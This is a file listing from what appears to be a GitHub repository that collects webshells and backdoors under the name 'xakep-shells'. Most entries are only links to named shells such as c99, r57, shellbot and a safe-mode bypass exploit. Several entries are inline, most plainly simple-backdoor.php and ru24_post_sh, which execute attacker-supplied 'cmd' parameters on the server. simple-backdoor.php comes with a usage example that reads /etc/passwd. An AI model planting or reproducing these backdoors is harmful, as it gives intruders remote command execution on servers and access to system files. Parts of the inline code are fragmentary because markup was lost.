/xakep-shells/JSP/JspWebshell 1.2.jsp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/JSP/JspWebshell 1.2.jsp.txt -------------------------------------------------------------------------------- /xakep-shells/PERL/shellbot.pl.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PERL/shellbot.pl.txt -------------------------------------------------------------------------------- /xakep-shells/PERL/telnet.pl.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PERL/telnet.pl.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/2008.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/2008.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/Antichat Socks5 Server.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/Antichat Socks5 Server.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/Ayyildiz Tim -AYT- Shell v 2.1 Biz.html.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/Ayyildiz Tim -AYT- Shell v 2.1 Biz.html.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/Casus15.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/Casus15.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/Crystal.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/Crystal.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/Dx.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/Dx.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/DxShell.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/DxShell.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/Fatalshell.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/Fatalshell.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/GFS web-shell ver 3.1.7 - PRiV8.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/GFS web-shell ver 3.1.7 - PRiV8.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/KA_uShell.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/KA_uShell.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/KAdot Universal Shell v0.1.6.html.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/KAdot Universal Shell v0.1.6.html.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/NetworkFileManagerPHP.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/NetworkFileManagerPHP.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/PH Vayv.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/PH Vayv.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/PHANTASMA.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/PHANTASMA.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/PHPRemoteView.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/PHPRemoteView.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/Private-i3lue.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/Private-i3lue.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/Rem View.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/Rem View.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/Russian.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/Russian.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/Sincap.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/Sincap.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/SnIpEr_SA Shell.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/SnIpEr_SA Shell.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/SpecialShell_99.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/SpecialShell_99.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/Test.php.php.txt: -------------------------------------------------------------------------------- 1 | 7 | 8 | 14 | -------------------------------------------------------------------------------- /xakep-shells/PHP/aZRaiLPhp v1.0.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/aZRaiLPhp v1.0.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/a_gedit.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/a_gedit.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/accept_language.php.txt: -------------------------------------------------------------------------------- 1 | by q1w2e3r4'; ?> 2 | -------------------------------------------------------------------------------- /xakep-shells/PHP/ak74shell.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/ak74shell.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/backdoor1.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/backdoor1.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/backdoorfr.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/backdoorfr.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/c2007.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/c2007.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/c99madshell_v2.1.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/c99madshell_v2.1.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/c99php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/c99php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/c99shell_v1.0.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/c99shell_v1.0.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/crystal.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/crystal.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/ctt_sh.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/ctt_sh.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/cyberlords_sql.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/cyberlords_sql.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/cybershell.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/cybershell.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/framer.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/framer.zip -------------------------------------------------------------------------------- /xakep-shells/PHP/gfs_sh.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/gfs_sh.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/iMHaPFtp.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/iMHaPFtp.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/img.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/img.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/load_shell.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/load_shell.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/myshell.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/myshell.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/mysql.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/mysql.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/network.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/network.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/nfm.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/nfm.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/ngh.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/ngh.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/nixrem.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/nixrem.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/nshell.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/nshell.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/nst.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/nst.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/nstview.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/nstview.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/phpshell17.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/phpshell17.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/phvayv.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/phvayv.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/phvayvv.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/phvayvv.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/r57 Shell.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/r57 Shell.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/r57shell.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/r57shell.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/rootshell.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/rootshell.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/rst_sql.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/rst_sql.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/ru24_post_sh.php.php.txt: -------------------------------------------------------------------------------- 1 | 11 | 12 | Ru24PostWebShell - ".$_POST['cmd']." 13 | 14 | "; 15 | echo "
"; 16 | echo ""; 17 | echo "
"; 18 | echo "
";
19 | if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -la"; }
20 | echo "".$function($_POST['cmd'])."
"; 21 | 22 | 23 | ?> 24 | -------------------------------------------------------------------------------- /xakep-shells/PHP/s72 Shell v1.1 Coding.html.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/s72 Shell v1.1 Coding.html.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/s72_shell.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/s72_shell.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/simple-backdoor.php.txt: -------------------------------------------------------------------------------- 1 | 2 | 3 | "; 7 | $cmd = ($_REQUEST['cmd']); 8 | system($cmd); 9 | echo ""; 10 | die; 11 | } 12 | 13 | ?> 14 | 15 | Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd 16 | 17 | 18 | -------------------------------------------------------------------------------- /xakep-shells/PHP/simple_cmd.html.txt: -------------------------------------------------------------------------------- 1 | 2 | 3 | G-Security Webshell 4 | 5 | 6 | 7 |
8 |
9 | 11 |
12 |
13 | 
14 | 
15 | 
16 |
17 | 18 | 2 | 3 | Send this file: 4 | 5 | 6 | 9 | 10 | -------------------------------------------------------------------------------- /xakep-shells/PHP/w.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/w.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/w4k.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/w4k.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/wacking.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/wacking.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/webadmin.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/webadmin.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/PHP/xinfo.php.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/PHP/xinfo.php.php.txt -------------------------------------------------------------------------------- /xakep-shells/README.md: -------------------------------------------------------------------------------- 1 | from http://files.xakep.biz/shells/ 2 | -------------------------------------------------------------------------------- /xakep-shells/others/mod_joomla_shell.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/others/mod_joomla_shell.PNG -------------------------------------------------------------------------------- /xakep-shells/others/mod_joomla_shell.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/others/mod_joomla_shell.zip -------------------------------------------------------------------------------- /xakep-shells/others/tools/DefaceKeeper_0.2.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/xakep-shells/others/tools/DefaceKeeper_0.2.php.txt --------------------------------------------------------------------------------